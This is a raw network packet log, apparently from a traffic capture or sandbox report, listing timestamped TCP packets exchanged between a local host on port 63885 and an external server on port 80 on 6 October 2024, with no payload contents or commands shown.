                                                                                                                                                Oct 6, 2024 22:18:48.490073919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490077972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490083933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490089893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490101099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490113974 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490170002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490170002 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490175962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490186930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490228891 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490267038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490278006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490287066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490295887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490305901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490317106 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490323067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490323067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490354061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490372896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490453959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490495920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490514040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490550995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490600109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490609884 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490617037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490685940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490695000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490736961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490746975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490828037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490839958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490849018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490859032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490868092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490879059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.490888119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490914106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.490933895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491075039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491085052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491094112 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491103888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491113901 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491122007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491132975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491154909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491154909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491166115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491197109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491352081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491362095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491370916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491380930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491396904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491400003 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491413116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491415024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491424084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491429090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491440058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491480112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491480112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491566896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491606951 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491616964 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491811991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491822958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491831064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491841078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491851091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491852999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491861105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491868019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491871119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491882086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491890907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491899014 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491899967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491910934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491919994 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491920948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491930962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491945028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491946936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491955042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491964102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491974115 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491974115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491986036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.491993904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.491995096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492008924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492021084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492034912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492063999 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492351055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492363930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492393970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492502928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492517948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492527008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492536068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492543936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492544889 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492553949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492563963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492573977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492574930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492602110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492614985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492630959 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492643118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492679119 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492759943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492769957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492779970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492789030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492796898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492803097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492815018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492822886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492825985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492837906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492850065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.492856979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492877007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.492901087 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493073940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493088961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493100882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493105888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493110895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493117094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493125916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493135929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493149042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493149042 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493160963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493170977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493175983 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493182898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493191957 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493192911 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493218899 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493242025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493552923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493562937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493571997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493581057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493591070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493599892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493602991 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493611097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493623018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493633032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493638039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493654966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493655920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493676901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493697882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493833065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493844986 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493854046 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493864059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493874073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493880033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493885040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.493896961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.493925095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.576710939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576736927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576747894 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576798916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576808929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576822042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576829910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576841116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576880932 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.576931000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.576931953 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577034950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577043056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577044964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577047110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577049971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577055931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577085018 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577107906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577281952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577292919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577302933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577325106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577337027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577347994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577358007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577359915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577370882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577395916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577419996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577444077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577454090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577480078 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577487946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577490091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577493906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577497959 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577500105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577518940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577527046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577605963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577668905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577725887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577737093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577745914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577760935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577789068 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577872038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577883005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577888966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577898979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.577913046 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.577929020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578017950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578027964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578033924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578042984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578052044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578058004 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578075886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578087091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578088045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578097105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578109026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578114986 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578119040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578131914 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578161001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578319073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578353882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578391075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578403950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578413010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578433037 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578445911 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578591108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578604937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578613997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578624964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578634024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578643084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578645945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578659058 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578669071 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578669071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578715086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578715086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578902006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578913927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578923941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578937054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578944921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578946114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578958988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578969002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578974962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.578979969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578991890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.578998089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579005003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579015017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579015970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579029083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579046011 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579071045 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579250097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579260111 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579269886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579278946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579288006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579288960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579304934 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579307079 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579319000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579324961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579332113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579344034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579350948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579355001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579379082 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579396009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579560995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579571009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579592943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579608917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579631090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579642057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579652071 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579663992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579673052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579674006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579684973 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.579701900 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.579718113 CEST6388580192.168.2.645.145.4.234
